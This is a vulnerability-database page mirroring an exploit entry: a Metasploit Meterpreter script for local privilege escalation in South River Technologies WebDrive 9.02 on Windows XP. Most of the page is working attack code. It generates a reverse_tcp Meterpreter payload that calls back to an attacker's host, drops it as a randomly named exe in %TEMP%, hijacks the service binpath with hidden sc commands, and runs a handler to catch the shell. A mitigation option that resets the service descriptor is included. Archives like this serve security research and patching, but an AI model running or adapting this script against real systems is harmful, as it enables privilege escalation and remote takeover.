Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

South River Technologies WebDrive Service Bad Security Descriptor Local

🗓️ 26 Jan 2010 00:00:00Reported by TrancerType 
zdt
 zdt🔗 0day.today👁 12 Views

South River Technologies WebDrive Service Privilege Escalation on Windows X

Code
============================================================================================
South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation
============================================================================================


##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
#  This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
#  Due to an empty security descriptor, a local attacker can gain elevated privileges.
#  Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
#  Vulnerability mitigation featured.
#
##
 
#
# Options
#
opts = Rex::Parser::Arguments.new(
    "-h"  => [ false,  "This help menu"],
    "-m"  => [ false,  "Mitigate"],
    "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
    "-p"  => [ true,   "The port on the remote host where Metasploit is listening"]
)
 
#
# Default parameters
#
 
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
 
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
    case opt
    when "-h"
        print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
        print_line(opts.usage)
        raise Rex::Script::Completed
    when "-m"
        client.sys.process.get_processes().each do |m|
            if ( m['name'] == pname )
                print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
                 
                # Set correct service security descriptor to mitigate the vulnerability
                print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
                client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
            end
        end
        raise Rex::Script::Completed
    when "-r"
        rhost = val
    when "-p"
        rport = val.to_i
    end
end
 
client.sys.process.get_processes().each do |m|
    if ( m['name'] == pname )
 
        print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
 
        # Build out the exe payload.
        pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
        pay.datastore['LHOST'] = rhost
        pay.datastore['LPORT'] = rport
        raw  = pay.generate
 
        exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 
        # Place our newly created exe in %TEMP%
        tempdir = client.fs.file.expand_path("%TEMP%")
        tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
        print_status("Sending EXE payload '#{tempexe}'.")
        fd = client.fs.file.new(tempexe, "wb")
        fd.write(exe)
        fd.close
 
        # Stop the vulnerable service
        print_status("Stopping service \"#{sname}\"...")
        client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
 
        # Set exe payload as service binpath
        print_status("Setting \"#{sname}\" to #{tempexe}...")
        client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
        sleep(1)
         
        # Restart the service
        print_status("Restarting the \"#{sname}\" service...")
        client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
 
        # Our handler to recieve the callback.
        handler = client.framework.exploits.create("multi/handler")
        handler.datastore['PAYLOAD']        = "windows/meterpreter/reverse_tcp"
        handler.datastore['LHOST']          = rhost
        handler.datastore['LPORT']          = rport
        handler.datastore['ExitOnSession']  = false
 
        handler.exploit_simple(
            'Payload'   => handler.datastore['PAYLOAD'],
            'RunAsJob'  => true
        )
 
        # Set service binpath back to normal
        client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
             
    end
end



#  0day.today [2018-03-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jan 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
south river technologieswebdriveprivilege escalationwindows xpvulnerability mitigation
12